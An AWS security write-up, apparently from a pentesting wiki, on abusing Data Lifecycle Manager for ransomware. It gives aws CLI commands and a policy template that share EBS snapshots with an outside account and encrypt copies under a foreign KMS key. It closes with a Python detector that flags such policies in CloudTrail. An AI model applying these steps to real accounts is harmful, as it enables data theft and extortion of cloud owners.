AWS - DLM Post Exploitation


Data Lifecycle Manager (DLM)

ec2:DescribeVolumes, dlm:CreateLifecyclePolicy

A ransomware attack can be carried out by encrypting a large number of EBS volumes and then deleting the EC2 instances, EBS volumes, and existing snapshots. To run this malicious operation, one can use Amazon DLM, encrypting the snapshots with a KMS key from another AWS account and transferring the encrypted snapshots to a different account. Alternatively, the snapshots can be transferred unencrypted to an account the attacker controls and encrypted there. Although it is not easy to encrypt existing EBS volumes or snapshots directly, it is possible to do so by creating a new volume or snapshot.

First, one would use a command to gather information about the volumes, such as the instance ID, volume ID, encryption status, attachment status, and volume type.

```bash
aws ec2 describe-volumes
```

Second, one would create the lifecycle policy. This command uses the DLM API to set up a lifecycle policy that automatically takes daily snapshots of the specified volumes at a given time. It also applies specific tags to the snapshots and copies tags from the volumes to the snapshots. The policyDetails.json file contains the details of the lifecycle policy, such as the target tags, the schedule, the optional ARN of the KMS key used for encryption, and the target account the snapshots are shared with; all of this will be recorded in the victim's CloudTrail logs.

```bash
aws dlm create-lifecycle-policy --description "My first policy" --state ENABLED --execution-role-arn arn:aws:iam::12345678910:role/AWSDataLifecycleManagerDefaultRole --policy-details file://policyDetails.json
```

A template for the policy document can be seen here:

```json
{
  "PolicyType": "EBS_SNAPSHOT_MANAGEMENT",
  "ResourceTypes": [
    "VOLUME"
  ],
  "TargetTags": [
    {
      "Key": "ExampleKey",
      "Value": "ExampleValue"
    }
  ],
  "Schedules": [
    {
      "Name": "DailySnapshots",
      "CopyTags": true,
      "TagsToAdd": [
        {
          "Key": "SnapshotCreator",
          "Value": "DLM"
        }
      ],
      "VariableTags": [
        {
          "Key": "CostCenter",
          "Value": "Finance"
        }
      ],
      "CreateRule": {
        "Interval": 24,
        "IntervalUnit": "HOURS",
        "Times": [
          "03:00"
        ]
      },
      "RetainRule": {
        "Count": 14
      },
      "FastRestoreRule": {
        "Count": 2,
        "Interval": 12,
        "IntervalUnit": "HOURS"
      },
      "CrossRegionCopyRules": [
        {
          "TargetRegion": "us-west-2",
          "Encrypted": true,
          "CmkArn": "arn:aws:kms:us-west-2:123456789012:key/your-kms-key-id",
          "CopyTags": true,
          "RetainRule": {
            "Interval": 1,
            "IntervalUnit": "DAYS"
          }
        }
      ],
      "ShareRules": [
        {
          "TargetAccounts": [
            "123456789012"
          ],
          "UnshareInterval": 30,
          "UnshareIntervalUnit": "DAYS"
        }
      ]
    }
  ],
  "Parameters": {
    "ExcludeBootVolume": false
  }
}
```
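The two settings in this template that move data out of the account are the ShareRules target accounts and the KMS key ARN in CrossRegionCopyRules, and both end up in the CloudTrail record of the CreateLifecyclePolicy call described above. The following is an added example, not code from HackTricks or from AWS: a small Python checker that reads a DLM policy document like the template, or the requestParameters of a CloudTrail CreateLifecyclePolicy record, and reports every share target and KMS key owner that is not in an allowlist of trusted account IDs. The trusted account 111111111111, the sample policy and the sample CloudTrail event are constructed for the example; the camelCase key names inside the CloudTrail record follow CloudTrail's usual rendering of request parameters and are an assumption.

```python
from typing import Any

# Constructed for this example: the account that owns the volumes.
# Any other account ID in a share rule or KMS key ARN is treated as foreign.
TRUSTED_ACCOUNTS = {"111111111111"}


def _lower_keys(obj: Any) -> Any:
    """Recursively lowercase dict keys so one code path handles the CLI's
    PascalCase policy document and the camelCase form CloudTrail records."""
    if isinstance(obj, dict):
        return {k.lower(): _lower_keys(v) for k, v in obj.items()}
    if isinstance(obj, list):
        return [_lower_keys(v) for v in obj]
    return obj


def _arn_account(arn: str) -> str:
    """Account ID field of an ARN (arn:partition:service:region:account:resource)."""
    parts = arn.split(":")
    return parts[4] if len(parts) >= 6 else ""


def analyze_policy(policy: dict, trusted: set[str] = TRUSTED_ACCOUNTS) -> list[str]:
    """Return one finding per setting that sends snapshot data outside `trusted`."""
    p = _lower_keys(policy)
    findings: list[str] = []
    for sched in p.get("schedules", []):
        name = sched.get("name", "<unnamed>")
        # Snapshots shared with an account the organisation does not own.
        for rule in sched.get("sharerules", []):
            for acct in rule.get("targetaccounts", []):
                if acct not in trusted:
                    findings.append(f"schedule {name}: snapshots shared with foreign account {acct}")
        # Cross-region copies encrypted under a key the organisation does not control.
        for rule in sched.get("crossregioncopyrules", []):
            cmk = rule.get("cmkarn", "")
            owner = _arn_account(cmk)
            if cmk and owner not in trusted:
                findings.append(
                    f"schedule {name}: copy to {rule.get('targetregion', '?')} "
                    f"encrypted with a KMS key owned by foreign account {owner}"
                )
    return findings


def analyze_cloudtrail_event(event: dict, trusted: set[str] = TRUSTED_ACCOUNTS) -> list[str]:
    """Apply analyze_policy to a CloudTrail record of dlm:CreateLifecyclePolicy."""
    if event.get("eventSource") != "dlm.amazonaws.com" or event.get("eventName") != "CreateLifecyclePolicy":
        return []
    params = event.get("requestParameters") or {}
    details = params.get("policyDetails") or {}  # assumed key name in the CloudTrail record
    actor = (event.get("userIdentity") or {}).get("arn", "<unknown principal>")
    return [f"CreateLifecyclePolicy by {actor}: {f}" for f in analyze_policy(details, trusted)]


# Constructed sample policy in the CLI's PascalCase form (mirrors the template above).
SAMPLE_POLICY = {
    "PolicyType": "EBS_SNAPSHOT_MANAGEMENT",
    "ResourceTypes": ["VOLUME"],
    "TargetTags": [{"Key": "ExampleKey", "Value": "ExampleValue"}],
    "Schedules": [{
        "Name": "DailySnapshots",
        "CreateRule": {"Interval": 24, "IntervalUnit": "HOURS", "Times": ["03:00"]},
        "RetainRule": {"Count": 14},
        "CrossRegionCopyRules": [{
            "TargetRegion": "us-west-2", "Encrypted": True,
            "CmkArn": "arn:aws:kms:us-west-2:123456789012:key/EXAMPLE-KEY-ID",  # constructed
            "CopyTags": True, "RetainRule": {"Interval": 1, "IntervalUnit": "DAYS"},
        }],
        "ShareRules": [{"TargetAccounts": ["123456789012"], "UnshareInterval": 30, "UnshareIntervalUnit": "DAYS"}],
    }],
    "Parameters": {"ExcludeBootVolume": False},
}

# Constructed sample CloudTrail record for the same API call (camelCase keys assumed).
SAMPLE_EVENT = {
    "eventSource": "dlm.amazonaws.com",
    "eventName": "CreateLifecyclePolicy",
    "userIdentity": {"arn": "arn:aws:iam::111111111111:user/example-user"},
    "requestParameters": {
        "description": "My first policy",
        "state": "ENABLED",
        "policyDetails": {
            "policyType": "EBS_SNAPSHOT_MANAGEMENT",
            "resourceTypes": ["VOLUME"],
            "schedules": [{"name": "DailySnapshots", "shareRules": [{"targetAccounts": ["123456789012"]}]}],
        },
    },
}

if __name__ == "__main__":
    for line in analyze_policy(SAMPLE_POLICY) + analyze_cloudtrail_event(SAMPLE_EVENT):
        print(line)
```

Feeding real CloudTrail records to analyze_cloudtrail_event turns this into a detection for the policy-creation step above: a CreateLifecyclePolicy call whose policyDetails share snapshots with, or encrypt copies under a key from, an account you do not own is the signal to investigate, and the same function run over GetLifecyclePolicy output audits policies that already exist.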
